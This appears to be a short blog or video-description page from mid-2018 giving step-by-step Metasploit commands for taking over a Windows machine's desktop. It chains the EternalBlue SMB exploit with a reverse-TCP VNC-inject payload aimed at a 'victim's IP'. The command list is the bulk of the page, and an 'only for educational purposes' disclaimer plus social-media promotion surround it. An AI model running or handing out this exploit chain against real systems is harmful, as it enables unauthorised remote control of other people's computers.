How to Enable Remote Desktop using Metasploit with Kali Linux 2018.2
How to Enable Windows remote Desktop using Metasploit (vncinject payload + eternalblue) with Kali Linux 2018.2
!!! ONLY FOR EDUCATIONAL PURPOSES !!!
commands:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhost victim'sip
set payload windows/x64/vncinject/reverse_tcp
set lhost yourip
set ViewOnly false
exploit
...
This works on targets that are vulnerable on eternalblue.
THANK YOU FOR WATCHING
SUBSCRIBE
SHARE
LIKE
FOLLOW US ON INSTAGRAM
https://www.instagram.com/kali_linux_...
FOLLOW US ON TWITTER
https://twitter.com/KALILINUXTRICKS
How to Enable Remote Desktop using Metasploit with Kali Linux 2018.2
Reviewed by Anonymous
on
August 04, 2018
Rating: